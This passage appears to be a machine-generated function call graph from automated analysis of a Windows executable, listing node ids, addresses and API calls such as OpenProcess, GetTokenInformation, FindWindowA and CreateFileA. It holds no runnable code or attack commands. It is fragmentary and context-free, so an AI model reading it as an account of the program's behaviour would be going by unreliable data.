77475 110cedc0 264 API calls 77459->77475 77591 110274c0 GetProcAddress SetLastError 77459->77591 77461 110297fb 77593 11027510 GetProcAddress SetLastError 77461->77593 77462->77459 77464->77458 77468 110294bc SetLastError 77464->77468 77465->77466 77470 11029521 SetLastError 77465->77470 77466->77458 77468->77458 77470->77458 77471->77458 77473 11029576 SetLastError 77471->77473 77472->77458 77474 11029531 SetLastError 77472->77474 77473->77458 77474->77458 77475->77459 77476->77458 77477 110295b8 SetLastError 77476->77477 77477->77478 77478->77458 77479 110295dd GetProcAddress 77478->77479 77479->77458 77480 1102960d SetLastError 77479->77480 77480->77481 77481->77458 77481->77482 77482->77458 77483 1102963a GetProcAddress 77482->77483 77483->77458 77484 11029676 SetLastError 77483->77484 77484->77458 77485->77330 77486->77339 77594 110ce2f0 77487->77594 77490 110ce519 77492 1115f3b5 _free 23 API calls 77490->77492 77491 110ce502 77598 110290f0 261 API calls 2 library calls 77491->77598 77496->77315 77497->77318 77503 110cf1bc 77502->77503 77504 110cf1d7 77503->77504 77505 110cf1c0 77503->77505 77518 110cdeb0 77504->77518 77547 110290f0 261 API calls 2 library calls 77505->77547 77512 110cf20e 77512->77415 77512->77416 77513 110cf1f7 77548 110290f0 261 API calls 2 library calls 77513->77548 77519 110cdeb9 77518->77519 77520 110cdebd 77519->77520 77521 110cded4 77519->77521 77549 110290f0 261 API calls 2 library calls 77520->77549 77523 110cded1 77521->77523 77524 110cdf08 77521->77524 77523->77521 77550 110290f0 261 API calls 2 library calls 77523->77550 77526 110cdf05 77524->77526 77527 110cdf26 77524->77527 77526->77524 77551 110290f0 261 API calls 2 library calls 77526->77551 77530 110cedc0 77527->77530 77531 110cedce 77530->77531 77532 110cedd2 77531->77532 77535 110cede9 77531->77535 77552 110290f0 261 API calls 2 library calls 77532->77552 77534 110cee90 77534->77512 77534->77513 77536 110cee1c 77535->77536 77537 110cede6 77535->77537 77536->77534 77554 110ce710 77536->77554 77537->77535 77553 110290f0 261 API calls 2 library calls 77537->77553 77543 110cee4f _memmove 77543->77534 77544 110cee79 77543->77544 77566 110290f0 261 API calls 2 library calls 77544->77566 77555 110ce71d 77554->77555 77556 110ce738 77555->77556 77557 110ce721 77555->77557 77558 110ce735 77556->77558 77559 110ce756 77556->77559 77572 110290f0 261 API calls 2 library calls 77557->77572 77558->77556 77573 110290f0 261 API calls 2 library calls 77558->77573 77567 110ce180 77559->77567 77565 110ce650 264 API calls 2 library calls 77565->77543 77568 110ce18b 77567->77568 77569 110ce1a2 77567->77569 77574 110290f0 261 API calls 2 library calls 77568->77574 77569->77543 77569->77565 77591->77459 77592->77461 77595 110ce309 77594->77595 77597 110ce31c 77594->77597 77596 110ce180 261 API calls 77595->77596 77595->77597 77596->77597 77597->77490 77597->77491 77600 1110c420 std::_Mutex::_Mutex 261 API calls 77599->77600 77601 110ffe0d 77600->77601 77602 110ffe40 77601->77602 77607 110ffcc0 77601->77607 77602->77355 77604 110ffe2d 77604->77355 77605->77359 77606->77361 77614 1115bd20 77607->77614 77610 110ffd27 std::_Mutex::_Mutex 77612 110ffd60 GetStockObject RegisterClassA 77610->77612 77611 110ffd91 CreateWindowExA 77611->77604 77612->77611 77613 110ffd8a 77612->77613 77613->77611 77617 1115ab80 GlobalAddAtomA 77614->77617 77618 1115abb5 GetLastError wsprintfA 77617->77618 77619 1115ac07 GlobalAddAtomA GlobalAddAtomA 77617->77619 77626 110290f0 261 API calls 2 library calls 77618->77626 77620 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77619->77620 77623 110ffcf1 GlobalAddAtomA 77620->77623 77623->77610 77623->77611 77628 1109dc40 GetTokenInformation 77627->77628 77633 1109dcd6 77627->77633 77629 1109dc62 __crtGetStringTypeA_stat 77628->77629 77632 1109dc68 GetTokenInformation 77629->77632 77629->77633 77630 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77631 1109dce8 77630->77631 77631->77217 77632->77633 77634 1109dc7a 77632->77634 77633->77630 77635 1109dcaf EqualSid 77634->77635 77636 1109dc83 AllocateAndInitializeSid 77634->77636 77635->77633 77637 1109dcbd 77635->77637 77636->77633 77636->77635 77638 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77637->77638 77639 1109dcd2 77638->77639 77639->77217 77641 1113f69a 77640->77641 77641->77233 77643 1116021d 77642->77643 77644 1116020b 77642->77644 77657 111601ac 75 API calls 2 library calls 77643->77657 77644->77242 77646 11160227 77646->77242 77648 11080d0d 77647->77648 77649 11080d12 77647->77649 77658 11080a30 IsDBCSLeadByte 77648->77658 77650 11080d1b 77649->77650 77651 11080d33 77649->77651 77659 1115ff54 81 API calls 2 library calls 77650->77659 77654 11080d39 77651->77654 77656 11161f66 81 API calls std::_Mutex::_Mutex 77651->77656 77654->77234 77655 11080d2c 77655->77234 77656->77651 77657->77646 77658->77649 77659->77655 77660->77087 77661->77081 77663 11165a57 __filbuf 34 API calls 77662->77663 77664 1116ba04 77663->77664 77665 1116ba26 77664->77665 77666 1116ba0f 77664->77666 77668 1116ba2a 77665->77668 77676 1116ba37 __stbuf 77665->77676 77683 11165abf 23 API calls __getptd_noexit 77666->77683 77684 11165abf 23 API calls __getptd_noexit 77668->77684 77670 1116ba8d __getbuf 77671 1116bb27 77670->77671 77672 1116baa7 77670->77672 77688 1116ea14 93 API calls 4 library calls 77671->77688 77673 1116babe 77672->77673 77679 1116badb 77672->77679 77686 1116ea14 93 API calls 4 library calls 77673->77686 77676->77670 77677 1116ba14 77676->77677 77685 11175308 34 API calls _sprintf 77676->77685 77677->77096 77679->77677 77687 11171e7e 39 API calls 5 library calls 77679->77687 77681->77093 77682->77096 77683->77677 77684->77677 77685->77670 77686->77677 77687->77677 77688->77677 77690 111610f6 77689->77690 77691 111610dd 77689->77691 77693 11161d95 77690->77693 77691->77690 77722 1116c9b8 8 API calls 77691->77722 77723 1116fe36 LeaveCriticalSection 77693->77723 77695 11161ce2 77696 11161a47 77695->77696 77697 11161a70 77696->77697 77703 11161a8b 77696->77703 77698 11161a7a 77697->77698 77700 1116170d __setlocale_set_cat 97 API calls 77697->77700 77705 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77698->77705 77699 11161bb5 77699->77698 77779 11161387 38 API calls 5 library calls 77699->77779 77700->77698 77702 11161bdc 77724 111614ec 77702->77724 77703->77699 77703->77702 77710 11161ac0 _strpbrk _strncmp _strcspn _strlen 77703->77710 77706 11161c61 77705->77706 77706->77118 77706->77122 77710->77698 77710->77699 77711 11161bce 77710->77711 77713 1116170d __setlocale_set_cat 97 API calls 77710->77713 77778 11165309 34 API calls _sprintf 77710->77778 77712 1116a682 __invoke_watson 10 API calls 77711->77712 77712->77698 77713->77710 77714->77104 77715->77110 77716->77124 77722->77690 77723->77695 77725 11167f85 __getptd 62 API calls 77724->77725 77728 11161527 77725->77728 77726 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77729 1116866f _strcpy_s 34 API calls 77728->77729 77735 1116158d _memmove _setlocale _strlen 77728->77735 77736 11161594 77728->77736 77729->77735 77731 1116a682 __invoke_watson 10 API calls 77731->77735 77733 1116866f _strcpy_s 34 API calls 77733->77735 77735->77731 77735->77733 77735->77736 77780 111611fd 77735->77780 77787 1117053c 77735->77787 77823 1116131c 34 API calls 3 library calls 77735->77823 77824 11165309 34 API calls _sprintf 77735->77824 77736->77726 77778->77710 77779->77698 77823->77735 77824->77735 77851 1113f146 77850->77851 77852 1113f203 77851->77852 77857 11080b10 77851->77857 77852->77133 77854 1113f16b 77855 11080b10 IsDBCSLeadByte 77854->77855 77856 1113f19b _memmove 77855->77856 77856->77133 77858 11080b1c 77857->77858 77860 11080b21 std::_Mutex::_Mutex 77857->77860 77861 11080a30 IsDBCSLeadByte 77858->77861 77860->77854 77861->77860 77900 11160c1d 77901 11160c29 __write 77900->77901 77902 11160c3c 77901->77902 77905 11160c6d 77901->77905 77937 11165abf 23 API calls __getptd_noexit 77902->77937 77904 11160c41 77938 1116a6d4 11 API calls _sprintf 77904->77938 77907 11167769 __lock_file EnterCriticalSection 77905->77907 77909 11160c4c __write 77905->77909 77908 11160c7b 77907->77908 77911 11165a57 __filbuf 34 API calls 77908->77911 77913 11160cf1 77908->77913 77910 11160d1e 77941 11160d4d LeaveCriticalSection LeaveCriticalSection __fsopen 77910->77941 77915 11160c8c 77911->77915 77913->77910 77919 1116e1f5 77913->77919 77915->77913 77939 11165abf 23 API calls __getptd_noexit 77915->77939 77917 11160ce6 77940 1116a6d4 11 API calls _sprintf 77917->77940 77920 1116e202 77919->77920 77925 1116e217 __getbuf 77919->77925 77972 11165abf 23 API calls __getptd_noexit 77920->77972 77922 1116e207 77973 1116a6d4 11 API calls _sprintf 77922->77973 77924 11165a57 __filbuf 34 API calls 77926 1116e260 77924->77926 77925->77924 77929 1116e212 77925->77929 77942 11170fc0 77926->77942 77928 1116e267 77928->77929 77930 11165a57 __filbuf 34 API calls 77928->77930 77929->77913 77931 1116e28a 77930->77931 77931->77929 77932 11165a57 __filbuf 34 API calls 77931->77932 77933 1116e296 77932->77933 77933->77929 77934 11165a57 __filbuf 34 API calls 77933->77934 77935 1116e2a3 77934->77935 77936 11165a57 __filbuf 34 API calls 77935->77936 77936->77929 77937->77904 77938->77909 77939->77917 77940->77913 77941->77909 77943 11170fcc __write 77942->77943 77944 11170fd4 77943->77944 77945 11170fef 77943->77945 77974 11165ad2 23 API calls __getptd_noexit 77944->77974 77947 11170ffb 77945->77947 77950 11171035 77945->77950 77976 11165ad2 23 API calls __getptd_noexit 77947->77976 77948 11170fd9 77975 11165abf 23 API calls __getptd_noexit 77948->77975 77953 11171057 77950->77953 77954 11171042 77950->77954 77952 11171000 77977 11165abf 23 API calls __getptd_noexit 77952->77977 77957 111731d2 ___lock_fhandle 3 API calls 77953->77957 77979 11165ad2 23 API calls __getptd_noexit 77954->77979 77960 1117105d 77957->77960 77958 11171008 77978 1116a6d4 11 API calls _sprintf 77958->77978 77959 11171047 77980 11165abf 23 API calls __getptd_noexit 77959->77980 77963 1117107f 77960->77963 77964 1117106b 77960->77964 77962 11170fe1 __write 77962->77928 77981 11165abf 23 API calls __getptd_noexit 77963->77981 77966 11170a09 __read_nolock 44 API calls 77964->77966 77968 11171077 77966->77968 77983 111710ae LeaveCriticalSection __unlock_fhandle 77968->77983 77969 11171084 77982 11165ad2 23 API calls __getptd_noexit 77969->77982 77972->77922 77973->77929 77974->77948 77975->77962 77976->77952 77977->77958 77978->77962 77979->77959 77980->77958 77981->77969 77982->77968 77983->77962 77984 11112b00 78002 11141990 77984->78002 77987 11112b28 77989 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77987->77989 77988 11112b54 CoInitialize CoCreateInstance 77991 11112b84 LoadLibraryA 77988->77991 78001 11112b79 77988->78001 77992 11112b36 77989->77992 77990 11141710 std::_Mutex::_Mutex 86 API calls 77993 11112b45 77990->77993 77994 11112ba0 GetProcAddress 77991->77994 77991->78001 77993->77987 77993->77988 77997 11112bb0 SHGetSettings 77994->77997 77998 11112bc4 FreeLibrary 77994->77998 77995 11112c61 CoUninitialize 77996 11112c67 77995->77996 77999 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 77996->77999 77997->77998 77998->78001 78000 11112c76 77999->78000 78001->77995 78001->77996 78003 11141710 std::_Mutex::_Mutex 86 API calls 78002->78003 78004 11112b1e 78003->78004 78004->77987 78004->77990 78004->77993 78005 11017610 GetTickCount 78012 11017520 78005->78012 78010 11142a60 std::_Mutex::_Mutex 21 API calls 78011 11017657 78010->78011 78013 11017540 78012->78013 78021 110175f6 78012->78021 78015 11017562 CoInitialize 78013->78015 78018 11017559 WaitForSingleObject 78013->78018 78014 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78017 11017605 78014->78017 78040 111585e0 78015->78040 78026 11017440 78017->78026 78018->78015 78019 110175e2 78020 110175f0 CoUninitialize 78019->78020 78019->78021 78020->78021 78021->78014 78022 110175dc 78052 11160007 35 API calls __fassign 78022->78052 78023 11017591 78023->78019 78023->78022 78025 111601fd std::_Mutex::_Mutex 75 API calls 78023->78025 78025->78023 78027 11017460 78026->78027 78028 11017506 78026->78028 78029 11017478 CoInitialize 78027->78029 78031 1101746f WaitForSingleObject 78027->78031 78030 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78028->78030 78032 111585e0 271 API calls 78029->78032 78033 11017515 SetEvent GetTickCount 78030->78033 78031->78029 78037 110174a7 78032->78037 78033->78010 78034 110174f2 78034->78028 78035 11017500 CoUninitialize 78034->78035 78035->78028 78036 110174ec 78086 11160007 35 API calls __fassign 78036->78086 78037->78034 78037->78036 78039 111601fd std::_Mutex::_Mutex 75 API calls 78037->78039 78039->78037 78041 111585f4 78040->78041 78042 111585ec 78040->78042 78053 1115f97b 78041->78053 78042->78023 78045 11158614 78045->78023 78046 11158740 78048 1115f3b5 _free 23 API calls 78046->78048 78049 11158768 78048->78049 78049->78023 78050 11158631 78050->78046 78051 11158724 SetLastError 78050->78051 78051->78050 78052->78019 78054 1116c936 __calloc_crt 23 API calls 78053->78054 78055 1115f995 78054->78055 78056 11158608 78055->78056 78077 11165abf 23 API calls __getptd_noexit 78055->78077 78056->78045 78056->78046 78060 11158220 CoInitializeSecurity CoCreateInstance 78056->78060 78058 1115f9a8 78058->78056 78078 11165abf 23 API calls __getptd_noexit 78058->78078 78061 11158295 wsprintfW SysAllocString 78060->78061 78062 11158414 78060->78062 78067 111582db 78061->78067 78063 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78062->78063 78064 11158440 78063->78064 78064->78050 78065 11158401 SysFreeString 78065->78062 78066 111583e9 78066->78065 78067->78065 78067->78066 78067->78067 78068 1115836c 78067->78068 78069 1115835a wsprintfW 78067->78069 78079 110967f0 78068->78079 78069->78068 78071 1115837e 78072 110967f0 262 API calls 78071->78072 78073 11158393 78072->78073 78084 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 78073->78084 78075 111583d7 78085 110968b0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 78075->78085 78077->78058 78078->78056 78080 1110c420 std::_Mutex::_Mutex 261 API calls 78079->78080 78081 11096823 78080->78081 78082 11096836 SysAllocString 78081->78082 78083 11096854 78081->78083 78082->78083 78083->78071 78084->78075 78085->78066 78086->78034 78087 11025850 78088 11025860 78087->78088 78089 1102585a 78087->78089 78090 11160535 std::_Mutex::_Mutex 98 API calls 78089->78090 78090->78088 78091 11030b10 78092 11030b1e 78091->78092 78096 11142490 78092->78096 78095 11030b3f std::ios_base::_Ios_base_dtor std::_Mutex::_Mutex 78099 11141680 78096->78099 78100 11141690 78099->78100 78100->78100 78101 1110c4a0 std::_Mutex::_Mutex 261 API calls 78100->78101 78102 111416a2 78101->78102 78105 111415b0 78102->78105 78104 11030b2f SetUnhandledExceptionFilter 78104->78095 78106 111415c7 _strncpy 78105->78106 78107 11141602 __crtGetStringTypeA_stat 78105->78107 78106->78106 78108 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78106->78108 78116 1113ed90 MultiByteToWideChar 78107->78116 78110 111415fe 78108->78110 78110->78104 78111 11141634 78117 1113edd0 WideCharToMultiByte GetLastError 78111->78117 78113 11141646 78114 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78113->78114 78115 11141659 78114->78115 78115->78104 78116->78111 78117->78113 78118 11137300 78119 1113730c 78118->78119 78120 111373da 78119->78120 78121 111373c8 78119->78121 78125 11137368 78119->78125 78121->78120 78122 11136060 374 API calls 78121->78122 78122->78120 78123 111373a0 78138 11136060 78123->78138 78125->78120 78125->78123 78128 1105d340 78125->78128 78126 111373b1 78129 1105d36f 78128->78129 78130 1105d395 78129->78130 78131 1105d375 78129->78131 78132 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78130->78132 78133 1115fe1b __wcstoi64 75 API calls 78131->78133 78134 1105d3a2 78132->78134 78135 1105d382 78133->78135 78134->78123 78136 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78135->78136 78137 1105d38f 78136->78137 78137->78123 78141 1113607d 78138->78141 78194 1113649f 78138->78194 78139 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78140 111364ae 78139->78140 78140->78126 78142 11141710 std::_Mutex::_Mutex 86 API calls 78141->78142 78141->78194 78143 111360bc 78142->78143 78144 1105d340 75 API calls 78143->78144 78143->78194 78145 111360eb 78144->78145 78218 111299f0 78145->78218 78147 11136230 PostMessageA 78149 11136245 78147->78149 78148 1105d340 75 API calls 78150 1113622c 78148->78150 78151 11136255 78149->78151 78232 1110c270 InterlockedDecrement 78149->78232 78150->78147 78150->78149 78153 1113625b 78151->78153 78154 1113627d 78151->78154 78156 111362b3 std::ios_base::_Ios_base_dtor 78153->78156 78157 111362ce 78153->78157 78233 1112d530 297 API calls std::_Mutex::_Mutex 78154->78233 78164 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78156->78164 78236 1113f4f0 78157->78236 78158 11136285 78234 111434d0 263 API calls 78158->78234 78162 111362d3 78241 111434f0 78162->78241 78163 1113628f 78235 11129bf0 SetDlgItemTextA 78163->78235 78167 111362ca 78164->78167 78167->78126 78169 111362a0 std::ios_base::_Ios_base_dtor 78169->78153 78170 111362f6 78244 11132620 295 API calls 5 library calls 78170->78244 78173 111361db 78173->78147 78173->78148 78174 111362fd std::ios_base::_Ios_base_dtor 78178 11136354 78174->78178 78182 11136327 78174->78182 78245 11132620 295 API calls 5 library calls 78174->78245 78176 1113642c 78177 1113644d 78176->78177 78184 1113643b 78176->78184 78185 11136434 78176->78185 78253 110f61e0 82 API calls 78177->78253 78178->78176 78181 11136368 78178->78181 78179 1113633c 78246 1112e330 143 API calls 78179->78246 78180 1113638c 78249 110f61e0 82 API calls 78180->78249 78181->78180 78247 11132620 295 API calls 5 library calls 78181->78247 78182->78178 78182->78179 78252 1112e330 143 API calls 78184->78252 78251 11132620 295 API calls 5 library calls 78185->78251 78190 1113634c 78190->78178 78194->78139 78196 11136376 78196->78180 78219 11129a0c 78218->78219 78220 11129a47 78219->78220 78221 11129a34 78219->78221 78255 1106ae60 294 API calls 78220->78255 78224 111434f0 265 API calls 78221->78224 78223 11129a3f 78225 11129a93 78223->78225 78226 1113e8f0 std::_Mutex::_Mutex 261 API calls 78223->78226 78224->78223 78225->78173 78227 11142150 78225->78227 78226->78225 78228 1110c650 4 API calls 78227->78228 78229 1114215f 78228->78229 78256 11141100 78229->78256 78232->78151 78233->78158 78234->78163 78235->78169 78237 1113f4f9 78236->78237 78238 1113f4ff 78236->78238 78237->78162 78239 1102a250 std::_Mutex::_Mutex 141 API calls 78238->78239 78240 1113f516 78239->78240 78240->78162 78271 111433b0 78241->78271 78244->78174 78245->78182 78246->78190 78247->78196 78251->78184 78255->78223 78267 110952d0 78256->78267 78259 11141124 wsprintfA 78260 11141137 78259->78260 78261 11141152 78260->78261 78262 1114113b 78260->78262 78266 11141163 78261->78266 78270 11140d70 5 API calls __ehhandler$___std_fs_remove@4 78261->78270 78269 110290f0 261 API calls 2 library calls 78262->78269 78266->78173 78268 110952d9 LoadStringA 78267->78268 78268->78259 78268->78260 78270->78266 78272 110952d0 78271->78272 78273 111433de LoadStringA 78272->78273 78274 11143402 78273->78274 78275 111433f0 78273->78275 78277 1114341e 78274->78277 78278 11143409 wsprintfA 78274->78278 78300 11140d70 5 API calls __ehhandler$___std_fs_remove@4 78275->78300 78279 11143426 78277->78279 78280 1114343a 78277->78280 78278->78280 78301 110290f0 261 API calls 2 library calls 78279->78301 78286 11143250 78280->78286 78284 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78285 111362da SetWindowTextA 78284->78285 78285->78170 78285->78174 78287 11080b10 IsDBCSLeadByte 78286->78287 78288 111432a0 78287->78288 78289 111432e3 wvsprintfA 78288->78289 78290 111601fd std::_Mutex::_Mutex 75 API calls 78288->78290 78292 111432f8 78289->78292 78293 111432b3 78290->78293 78291 11143314 78295 1113e8f0 std::_Mutex::_Mutex 261 API calls 78291->78295 78292->78291 78294 11142a60 std::_Mutex::_Mutex 21 API calls 78292->78294 78293->78289 78297 111432c0 FormatMessageA 78293->78297 78294->78291 78296 11143324 78295->78296 78298 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78296->78298 78297->78292 78299 111433a6 78298->78299 78299->78284 78300->78274 78302 11132080 78303 11132089 78302->78303 78309 111320b8 78302->78309 78304 11141990 std::_Mutex::_Mutex 86 API calls 78303->78304 78305 1113208e 78304->78305 78305->78309 78310 1112fc80 78305->78310 78307 11132097 78308 1105d340 75 API calls 78307->78308 78307->78309 78308->78309 78311 1112fca1 std::_Mutex::_Mutex 78310->78311 78335 1112fdc1 78310->78335 78314 1112fcb6 78311->78314 78315 1112fccd 78311->78315 78312 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78313 1112fdd5 78312->78313 78313->78307 78316 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78314->78316 78317 11141240 std::_Mutex::_Mutex 261 API calls 78315->78317 78318 1112fcc9 78316->78318 78319 1112fcda wsprintfA 78317->78319 78318->78307 78338 1113f8a0 78319->78338 78321 1112fd00 78322 1112fd07 78321->78322 78323 1112fd78 78321->78323 78349 110b6bd0 78322->78349 78324 11141240 std::_Mutex::_Mutex 261 API calls 78323->78324 78326 1112fd84 wsprintfA 78324->78326 78328 1113f8a0 std::_Mutex::_Mutex 8 API calls 78326->78328 78327 1112fd12 78329 1112fda4 78327->78329 78330 1112fd1a GetTickCount SHGetFolderPathA GetTickCount 78327->78330 78328->78329 78333 11142a60 std::_Mutex::_Mutex 21 API calls 78329->78333 78331 1112fd50 78330->78331 78332 1112fd45 78330->78332 78331->78329 78364 110eb6b0 9 API calls 78331->78364 78334 11142a60 std::_Mutex::_Mutex 21 API calls 78332->78334 78333->78335 78334->78331 78335->78312 78337 1112fd73 78337->78329 78339 1113f8c1 CreateFileA 78338->78339 78341 1113f95e CloseHandle 78339->78341 78342 1113f93e 78339->78342 78345 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78341->78345 78343 1113f942 CreateFileA 78342->78343 78344 1113f97b 78342->78344 78343->78341 78343->78344 78347 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78344->78347 78346 1113f977 78345->78346 78346->78321 78348 1113f98a 78347->78348 78348->78321 78350 110b6be3 GetModuleHandleA GetProcAddress 78349->78350 78351 110b6ca4 78349->78351 78352 110b6c2a GetCurrentProcessId OpenProcess 78350->78352 78353 110b6c0f GetCurrentProcessId 78350->78353 78351->78327 78354 110b6c77 78352->78354 78355 110b6c47 OpenProcessToken 78352->78355 78356 110b6c18 78353->78356 78360 110b6c93 CloseHandle 78354->78360 78361 110b6c96 78354->78361 78355->78354 78357 110b6c58 78355->78357 78356->78352 78358 110b6c1c 78356->78358 78357->78354 78359 110b6c5f GetTokenInformation 78357->78359 78358->78327 78359->78354 78360->78361 78362 110b6c9a CloseHandle 78361->78362 78363 110b6c9d 78361->78363 78362->78363 78363->78351 78364->78337 78365 11088b50 78366 1110c650 4 API calls 78365->78366 78367 11088b63 78366->78367 78368 11088b6d 78367->78368 78377 11088290 264 API calls std::_Mutex::_Mutex 78367->78377 78370 11088b94 78368->78370 78378 11088290 264 API calls std::_Mutex::_Mutex 78368->78378 78373 11088ba3 78370->78373 78374 11088b20 78370->78374 78379 110887b0 78374->78379 78377->78368 78378->78370 78420 11087ab0 6 API calls 78379->78420 78381 110887e9 GetParent 78382 110887fc 78381->78382 78383 1108880d 78381->78383 78385 11088800 GetParent 78382->78385 78384 11141430 263 API calls 78383->78384 78386 11088819 78384->78386 78385->78383 78385->78385 78387 1116076b std::_Mutex::_Mutex 139 API calls 78386->78387 78388 11088826 std::ios_base::_Ios_base_dtor 78387->78388 78389 11141430 263 API calls 78388->78389 78390 1108883f 78389->78390 78421 110139e0 22 API calls 2 library calls 78390->78421 78392 1108885a 78392->78392 78393 1113f8a0 std::_Mutex::_Mutex 8 API calls 78392->78393 78395 1108889a std::ios_base::_Ios_base_dtor 78393->78395 78394 110888b5 78396 11160535 std::_Mutex::_Mutex 98 API calls 78394->78396 78398 110888d3 std::_Mutex::_Mutex 78394->78398 78395->78394 78397 1113e8f0 std::_Mutex::_Mutex 261 API calls 78395->78397 78396->78398 78397->78394 78399 1102a250 std::_Mutex::_Mutex 141 API calls 78398->78399 78411 11088984 std::ios_base::_Ios_base_dtor 78398->78411 78401 11088923 78399->78401 78400 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78402 11088a72 78400->78402 78403 1113e8f0 std::_Mutex::_Mutex 261 API calls 78401->78403 78402->78373 78404 1108892b 78403->78404 78405 11080be0 std::_Mutex::_Mutex IsDBCSLeadByte 78404->78405 78406 11088942 78405->78406 78406->78411 78422 11080c50 78406->78422 78408 1108895a 78409 1108899e 78408->78409 78410 11088961 78408->78410 78412 11080c50 82 API calls 78409->78412 78432 110b6880 78410->78432 78411->78400 78414 110889a9 78412->78414 78414->78411 78416 110b6880 36 API calls 78414->78416 78418 110889b6 78416->78418 78417 110b6880 36 API calls 78417->78411 78418->78411 78419 110b6880 36 API calls 78418->78419 78419->78411 78420->78381 78421->78392 78423 11080c5d 78422->78423 78424 11080c62 78422->78424 78435 11080a30 IsDBCSLeadByte 78423->78435 78426 11080c6b 78424->78426 78429 11080c7f 78424->78429 78436 11160e4e 81 API calls 2 library calls 78426->78436 78428 11080c78 78428->78408 78430 11080ce3 78429->78430 78431 11161f66 81 API calls std::_Mutex::_Mutex 78429->78431 78430->78408 78431->78429 78437 110b6860 78432->78437 78435->78424 78436->78428 78440 11163ab3 78437->78440 78443 11163a34 78440->78443 78444 11163a41 78443->78444 78445 11163a5b 78443->78445 78461 11165ad2 23 API calls __getptd_noexit 78444->78461 78445->78444 78447 11163a64 GetFileAttributesA 78445->78447 78449 11163a72 GetLastError 78447->78449 78455 11163a88 78447->78455 78448 11163a46 78462 11165abf 23 API calls __getptd_noexit 78448->78462 78464 11165ae5 23 API calls 3 library calls 78449->78464 78452 11088967 78452->78411 78452->78417 78453 11163a4d 78463 1116a6d4 11 API calls _sprintf 78453->78463 78454 11163a7e 78465 11165abf 23 API calls __getptd_noexit 78454->78465 78455->78452 78466 11165ad2 23 API calls __getptd_noexit 78455->78466 78459 11163a9b 78467 11165abf 23 API calls __getptd_noexit 78459->78467 78461->78448 78462->78453 78463->78452 78464->78454 78465->78452 78466->78459 78467->78454 78468 1102e15e 78469 11080c50 82 API calls 78468->78469 78470 1102e171 78469->78470 78471 1113f220 82 API calls 78470->78471 78472 1102e19a 78471->78472 78473 1115f5b7 std::_Mutex::_Mutex 75 API calls 78472->78473 78478 1102e1a7 78472->78478 78473->78478 78474 1102e1d6 78475 1102e248 78474->78475 78476 1102e22f GetSystemMetrics 78474->78476 78480 1102e262 CreateEventA 78475->78480 78476->78475 78477 1102e23e 78476->78477 78479 11142a60 std::_Mutex::_Mutex 21 API calls 78477->78479 78478->78474 78481 11141710 std::_Mutex::_Mutex 86 API calls 78478->78481 78479->78475 78482 1102e275 78480->78482 78483 1102e289 78480->78483 78481->78474 79378 110290f0 261 API calls 2 library calls 78482->79378 78485 1110c420 std::_Mutex::_Mutex 261 API calls 78483->78485 78486 1102e290 78485->78486 78487 1110d060 420 API calls 78486->78487 78488 1102e2b0 78487->78488 78489 1110c420 std::_Mutex::_Mutex 261 API calls 78488->78489 78490 1102e2c4 78489->78490 78491 1110d060 420 API calls 78490->78491 78492 1102e2e4 78491->78492 78493 1110c420 std::_Mutex::_Mutex 261 API calls 78492->78493 78494 1102e363 78493->78494 78495 11060520 261 API calls 78494->78495 78496 1102e393 78495->78496 78497 1110c420 std::_Mutex::_Mutex 261 API calls 78496->78497 78498 1102e3ad 78497->78498 78499 1102e3d6 FindWindowA 78498->78499 78500 1102e527 78499->78500 78501 1102e40b 78499->78501 78831 11060970 78500->78831 78501->78500 78505 1102e423 GetWindowThreadProcessId 78501->78505 78504 11060970 264 API calls 78506 1102e545 78504->78506 78507 11142a60 std::_Mutex::_Mutex 21 API calls 78505->78507 78508 11060970 264 API calls 78506->78508 78509 1102e449 OpenProcess 78507->78509 78511 1102e551 78508->78511 78509->78500 78510 1102e469 78509->78510 78515 11142a60 std::_Mutex::_Mutex 21 API calls 78510->78515 78512 1102e568 78511->78512 78513 1102e55f 78511->78513 78838 11141f80 78512->78838 79379 110279d0 115 API calls 2 library calls 78513->79379 78518 1102e49c 78515->78518 78516 1102e564 78516->78512 78520 1102e4db CloseHandle FindWindowA 78518->78520 78522 11142a60 std::_Mutex::_Mutex 21 API calls 78518->78522 78519 1102e577 78521 11141430 263 API calls 78519->78521 78523 1102e503 GetWindowThreadProcessId 78520->78523 78524 1102e517 78520->78524 78525 1102e588 78521->78525 78526 1102e4ae SendMessageA WaitForSingleObject 78522->78526 78523->78524 78527 11142a60 std::_Mutex::_Mutex 21 API calls 78524->78527 78526->78520 78529 1102e4ce 78526->78529 78530 1102e524 78527->78530 78531 11142a60 std::_Mutex::_Mutex 21 API calls 78529->78531 78530->78500 78532 1102e4d8 78531->78532 78532->78520 78832 110609e6 78831->78832 78837 11060997 78831->78837 78833 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78832->78833 78834 1102e539 78833->78834 78834->78504 78835 11080c50 82 API calls 78835->78837 78837->78832 78837->78835 79401 11060890 264 API calls 4 library calls 78837->79401 78839 11141240 std::_Mutex::_Mutex 261 API calls 78838->78839 78840 11141f9b wsprintfA 78839->78840 78841 11141240 std::_Mutex::_Mutex 261 API calls 78840->78841 78842 11141fb7 wsprintfA 78841->78842 78843 1113f8a0 std::_Mutex::_Mutex 8 API calls 78842->78843 78845 11141fd4 78843->78845 78844 11142000 